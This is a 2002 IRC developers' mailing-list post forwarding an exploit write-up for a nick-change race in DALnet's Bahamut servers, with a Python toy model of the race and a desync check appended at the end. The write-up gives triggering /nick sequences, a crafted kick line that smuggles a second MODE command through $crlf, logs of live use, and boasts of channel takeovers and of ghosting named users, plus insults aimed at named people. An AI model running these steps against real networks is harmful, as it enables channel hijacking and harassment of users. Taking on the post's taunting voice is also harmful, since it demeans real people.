[IRC-DEV] (fwd) weird bahamut (and possibly others) sync bug

RoMaNSoFt roman at madrid.com
Fri Feb 15 20:12:48 CET 2002


 Well then, let's see if you, the ones who really "know" this IRC stuff,
can tell me the following. Would it work on irc-hispano? Has anyone
tried it on any network? =)

 Cheers,
 --Roman


On Fri, 15 Feb 2002 02:58:42 +0000, ET <bofh at phreaker.net> wrote:

=================== WEIRD DALNET SYNC BUG =========================
(my first post! don't bug me if i didn't get it picture perfect)
Author:  Enstyne
Contact: irc.cyberarmy.com #cyberarmy

Dates:   June 8 2001 -- original document
             Feb  9 2002 -- revised for distribution

-----------------------------------------------------
VENDOR STATUS:
I notified the dalnet bahamut crew almost 2 years ago.
i was slightly sketchy on info, but as clearly as i explained
it, they thought i was "just describing lag".
A friend of mine 'llthangel' was there at the time, part
of the unrealircd team. He was also turned away as if
this was useless info.

Two years is enough time to test/acknowledge a problem, in my opinion.
-----------------------------------------------------

PLEASE NOTE: this exploit has lots of variables, i have
reproduced the effect more than 100 times at many different
occasions, including a few days before this document.
Also note that this is very hard for me to explain in words,
and to get across the idea in my head. Don't ask...
It works and many people are witnesses to it being used
several times.
-----------------------------------------------------

REPERCUSSIONS:
I have reproduced the following effects using this bug:
Invisibility on channels
Invisible Operator Status (kick people while deoped, etc)
Invulnerability to CHANSERV MKICK and CHANSERV DEOP
Complete acquisition of /WHOIS info from the remote party involved
   ^^^ That means you can kind of hide your host.
-----------------------------------------------------

OVERVIEW:
Assessment: This is (i think) a bug in the TS3 protocol.

Requirements: more lag in one direction than the other
               on two separate servers. (Don't ask, it happens)

Comments:
This probably works on lots of networks other than dalnet,
but dalnet is the one i've tested it on. It seems like a
"race condition" exploit due to the requirement of lag;
it used to give you a few minutes until you see some
movement on the other side, it was so bad....
-----------------------------------------------------


DESCRIPTION:
I'll take for this example, two clients and a US and an EU server
that have been connected a long way away from each other, as the lag
is greater over greater distances between servers (generally).

Now, you both join them to a channel...
say,
#ch0wn

then in the channel you have both nicks like
Ens1 and Ens2

Ens1 on US.dal.net
Ens2 on EU.dal.net

------------------------------------
Please note that the messages going from the EU->US server go
faster than the messages going US->EU.
This is a strange(beats me) but vital part of the exploit.
---------------------------

Part 1):
UK Screen:

**** Now talking in #ch0wn
	(/nick Enspine | nick halfghost )
*** Ens1 is now known as Enspine
*** Enspine is now known as halfghost
*** Ens2 is now known as Enspine

Part 2):
US Screen:

**** Now talking in #ch0wn
(/nick Enspine)
*** Ens2 is now known as Enspine
(a couple of seconds/minutes later)
*** Ens1 has quit IRC (Killed (EU.dal.net -> (Enspine) US.dal.net)


----------------------------

But since the person being killed is Enspine on the US side, which
does not exist on that side, but on the EU side, the kill path is
flawed and is therefore rejected on all but the EU server.

The result of all this becomes that the nick "halfghost" on the
US server, does not exist on all parts of the network.

any command that goes through the servers this nick does not exist
on will result in a kill message such as:
*** halfghost has quit IRC (Killed (EU.dal.net -> (halfghost(?)) US.dal.net))

to test this you could use something like:
./whois chanserv == won't kill
./whois EU.dal.net chanserv == will kill

-----------------------------

Now we can build us up a cool packet
like /kick #ch0wn Chawmp . $+ $crlf $+ MODE #ch0wn +inm
this will only happen around locally as all the other servers
will reject the message. Chawmp will not auto-rejoin.
And "halfghost" will get killed by the server.

chawmp is on the EU server by the way.

Every time he speaks he'd get a message
from the desync'd server saying that he's not on channel.
if he rejoins, and doesn't get opped.. then he will also get messages
about the moderated channel, but yet he will see +m is not set!

The funny thing about desyncs is that when you desync something
it can sometimes start to spread more than what you started

say chawmp is opped on #ch0wn but has been "locally kicked" by
halfghost
then a guy named "lamer" joins on any server.
If chawmp ops him, he won't be opped on the US server!

therefore now the EU server has its share of desyncs too
especially if "lamer" starts setting channel modes

Also, you may be able to empty a channel of people with the halfghost
and they would never know, then you can join a client onto the US
server and get opped by the server, and not deopped by chanserv
(if you're lucky) and would look, on the EU server, like you're not opped
at all.

-----------------------------
The only aliases i used for the test were: (on mIRC)
/col /nick Enspine
/cob /nick Enspine | /nick Enx435

^^^ lol, if you are using those to test this out i wish you good luck.
-----------------------------





LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(from one client's view)
[23:34] <wa1800z> it's a hole bigger then their irc addicted asses but they dun wanna admit it
[23:34] <Chawmp> Enstyne, do the sploit again! :)
[23:34] <wa1800z> lol
[23:34] <Enstyne> okay, but if i get klined
[23:34] <Chawmp> want whoot :)
[23:34] <Enstyne> it's Chawmp's fault
[23:35] <Enstyne> lol
[23:35] <Chawmp> Enstyne :)
[23:35] <wa1800z> noted
[23:35] <wa1800z> ;)
[23:35] <Chawmp> i'd give you a shell....
[23:35] <Chawmp> but i only g0t 56k :_)
[23:35] <Enstyne> lol
[23:35] <Enstyne> i know
[23:35] <Enstyne> i already have a root shell Chawmp
[23:35] <Enstyne> lol... j/k
[23:36] <Chawmp> lol :)
[23:36] *** Enstyne is now known as Ens|US
[23:36] <Chawmp> heheh
[23:36] *** Ens|US is now known as Enspine
[23:36] *** Enspine is now known as Enstyn
[23:36] <Enstyn> hmmmmmm
[23:36] <Enstyn> seems to have worked
[23:36] <Enstyn> :)
[23:36] <Enstyn> let's check
[23:36] <Chawmp> ooo... that quick?!?!
[23:37] <Enstyn> brb
[23:37] *** Disconnected
Session Close: Tue Oct 31 23:37:18 2000




LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(SEPARATE INCIDENT, THIS ONE MAY BE EASIER TO UNDERSTAND)
(server A)
[20:57] *** Enstyne is now known as Enspine
[20:57] *** Enspine is now known as Enstyn

(server B)
[20:57] *** Ens|UKKKkkk is now known as Enspine
(the other chnick to Enspine got through then and killed me)
[20:57] *** Disconnected

(server A)
[20:57] *** Ens|UKKKkkk is now known as Enspine
[20:57] <Enstyn> hmmmmm
[20:57] <Enstyn> how many do you see?
[20:57] <Chawmp> 2 ppl...
[20:57] <Chawmp|UK> 1 person
[20:57] <Chawmp> 2
[20:57] <Chawmp|UK> 1
[20:57] <Enstyn> lol
[20:57] <Enstyn> okay
[20:57] <Enstyn> that worked
[20:58] <Chawmp|UK> !!!
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for jullia^!~banasor at 212.253.45.101. From adm Path: philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> yAY
[20:58] * Enstyn thinks
[20:58] <Enstyn> what do i do next
[20:58] <Enstyn> hmmmmmm
[20:58] <Chawmp|UK> :)
[20:58] <Enstyn> Chawmp: what's the "invisi" persons nick
[20:58] <Enstyn> since i'm "Enstyn"
[20:58] <Chawmp|UK> well
[20:58] <Enstyn> what's the other?
[20:58] <Chawmp|UK> must be enspine then
[20:58] <Enstyn> yep
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for angelia``!~banasor at 212.253.45.101. From adm Path: philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> enspine: No such nick/channel
[20:58] <Enstyn> okay.. join #cyberarmy with chawmp|UK
[20:58] <Chawmp> Enspine (admin at 194.165.169.25) [Unknown]
[20:58] <Chawmp> :)
[20:59] <Chawmp|UK> ok...
[20:59] <Enstyn> then change nick to Enspine
[20:59] <Chawmp|UK> done
[20:59] <Enstyn> exactly
[20:59] *** Chawmp|UK has quit IRC (Killed (netropolis-r.uk.eu.dal.net (lineone.uk.eu.dal.net(Enspine) <- lineone.uk.eu.dal.net[unknown at localhost])))
[20:59] <Enstyn> your invis!
[20:59] <Enspine> done
[20:59] <Chawmp> !!!!
[20:59] <Chawmp> !!!!!
[20:59] <Chawmp> r00t!
[20:59] <Enstyn> LOl
[20:59] <Enstyn> you are!~!@!
[21:00] <Chawmp> argh
[21:00] <Chawmp> i cant operize
[21:00] <Enstyn> Chawmp: i'll go op you

      ^^^^ note that in the above he had become invisible to services
           well, in a way, because they also thought he wasn't on the
           channel he was requesting ops on.
           It looked like Chawmp|UK had died but i was just on a server
           which got the invisibility effect. "Chawmp|UK" turned
           into Enspine afterwards... and kind of brought it back to
           life :)



-------------------------------
FINAL NOTES:
I hope at least one person on this mailing list can understand this.
I have also exploited this bug before by using nickserv ghost. (figure it out, same concept)
ghost the nick on US server, then at the same time, change the nick getting ghosted by
nickserv to a different nick... if it says 'nick whatever was ghosted' and the client didn't get
disconnected, then it works..... think of the possibilities :)


---------------------------------------------------------------------------------------
SHOUTS:
Anyone interested in the matrix && irc... should really take a look at this:
http://cashells.massiveisp.net/~ens/matrixstory.txt

Shouts tew the ch0wn krew! on irc.cyberarmy.com
the people of the ch0wn krew went through extensive confusion as
i developed this exploit, actually even i was pretty confused.
Chawmp  - in this case, you weren't confused you were just loving it. lol.
¿g0t? is chawmp's trademark.
keoki   - for kicking the people i wouldn't dare while invisible under the effect. lol
wa1800z - you seem way too busy nowadays for *
shad    - for telling me to "write it up" instead of trying to explain it every time. kraft addict
think12 - you seem to have a remarkable tolerance for the weird c**p i do, unbottle though!
gM      - haha, i always forgot to include you before, so you're in now! (gM knows his irc stuff)
nsh     - college life catchin' up on ya? brilliant mind this guy has.
The_Itch- he views the world through cee-debug glasses, irc wizard! (and has lots of 0days too, so annoy him)
(AND OTHERS TOO) :)

xtra shouts to the #cyberarmy, irc.cyberarmy.com crew
Cass (Weapon of choice, Loki of the attackbots)
Di]v[pLes (taken so much stick and given so much)
matt999 (the Matt that isn't vulnerable to +++ATH0)
darkroot (who sooooo wanted me to give him this info to him first hehe)
blexim (tonnes of testing and messing about. lol)
hellz (we used holodeck irc sim program to msg this guy w/ 12,000 bots)
Quantum_Knight (man, you relieve me of my sanity)
Kaladis (for observing experiments in #cyberarmy with laughter)
(+ OTHERS I FORGOT) it's 2am today and i'm exhausted, bleh :)

w1z - lmao man, that was so funny when we made you receive the wrong whois info and
       turned you invisible so BaDaSSS couldn't do anything. Hahaha.

Chawmp, keoki and I took over DALnet #kkk for a couple of hours with this (hush hush).
This exploit is dedicated to Douglas Adams, the Shakespeare of our modern world.


---------------------------------------------------------------------------------------
ANTI-SHOUTS:
BaDaSSS - you are one of the silliest people i've ever met, you will never get anywhere unless
           you accept things and seek professional help.
           you cried to me after losing your aop in #cyberarmy and then nagged llthangel about
           it for years afterwards... pssht...
           and i thought you "didn't give a *" ... you've had it coming for a long long time.

           p.s. haha, I owned your services and ghosted your ass from your own network.

Ron885 - Same story except you didn't strike it lucky and get aop in #cyberarmy
          You took all the wrong turns man and ended up in lamerville. Also got ghosted.

script0r - you were okay, but then you turned into an almost hitler-like domineer.
            You still are good natured at heart though. -Ghosted- (only because you started setpassing)

Wacko/MaxD/MaxDemian/whatever - Wacko(ff) you are so unbelievably blind a bat would pity you.
            "you don't winsock to make a http request, you use INet you ..." (erm, yeah, ok)
            like it matters. Most of the people you think like you wacko don't. Believe me
            because they've told me. This guy had to beg for crazyhorse to stop conconing his
            oh-so-elite vb webserver he'd coded up. I wonder if he used Inet for that as well :)

---------------------------------------------------------------------------------------
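The nick-change race in the forwarded write-up, as an added illustration that is neither part of the original post nor Bahamut's code: a toy two-server model with asymmetric link delay, a name-based collision rule, and a consistency check that flags nicks present on one server but not the other. The servers, nicks and message order come from the write-up; the delays, the "kill both colliding nicks" rule and the "drop a KILL for an unknown nick" rule are assumptions chosen to reproduce the symptom described (a nick known to one server only), not the real TS3 logic.

```python
import heapq

# Constructed two-server model of the nick-change race. Not Bahamut's TS3 code:
# each server keeps its own nick table, relays NICK changes to its peer, and on a
# collision kills both nicks by name. A KILL naming a nick the receiver no longer
# knows is silently dropped, which is what leaves a ghost entry behind.

class Net:
    def __init__(self, delay, users):      # delay[(src, dst)] in ms; users: nick -> home server
        self.delay, self.queue, self.now, self.seq = delay, [], 0, 0
        self.nicks = {s: dict(users) for s in {d for pair in delay for d in pair}}

    def send(self, src, dst, msg):          # queue msg for arrival after the one-way delay
        heapq.heappush(self.queue, (self.now + self.delay[(src, dst)], self.seq, src, dst, msg))
        self.seq += 1

    def local_nick(self, here, old, new):   # a client on server `here` runs /nick new
        if new in self.nicks[here]:         # in use locally: refused, nothing is relayed
            return
        self.nicks[here][new] = self.nicks[here].pop(old)
        for peer in (p for p in self.nicks if p != here):
            self.send(here, peer, ("NICK", old, new))

    def deliver(self, src, dst, msg):       # apply a relayed NICK or KILL on server dst
        tbl, (kind, old, new) = self.nicks[dst], msg
        if kind == "KILL":
            tbl.pop(old, None)              # unknown here: the KILL is silently dropped
        elif old not in tbl:                # views already diverged: change is dropped
            return
        elif new in tbl:                    # remote collision: kill both parties by name
            for victim in (old, new):
                tbl.pop(victim); self.send(dst, src, ("KILL", victim, None))
        else:
            tbl[new] = tbl.pop(old)

    def run(self, until=float("inf")):      # deliver every message that arrives by `until`
        while self.queue and self.queue[0][0] <= until:
            self.now, _, src, dst, msg = heapq.heappop(self.queue)
            self.deliver(src, dst, msg)

def desync(net):
    """Defender's check: nicks that exist on some servers but not on all of them."""
    views = [set(t) for t in net.nicks.values()]
    return set.union(*views) - set.intersection(*views)

def race(ens2_delay_ms):
    """Ens1 on US does /nick Enspine then /nick halfghost at t=0; Ens2 on EU does
    /nick Enspine at t=ens2_delay_ms. US->EU (300 ms) is the slow direction."""
    net = Net({("US", "EU"): 300, ("EU", "US"): 50}, {"Ens1": "US", "Ens2": "EU"})
    net.local_nick("US", "Ens1", "Enspine")
    net.local_nick("US", "Enspine", "halfghost")
    net.run(until=ens2_delay_ms); net.now = ens2_delay_ms
    net.local_nick("EU", "Ens2", "Enspine")
    net.run()
    return desync(net)
```

With Ens2 renaming before the US changes reach EU, `race(10)` leaves "halfghost" on the US table only; with Ens2 waiting until after they arrive, `race(400)` leaves the tables consistent.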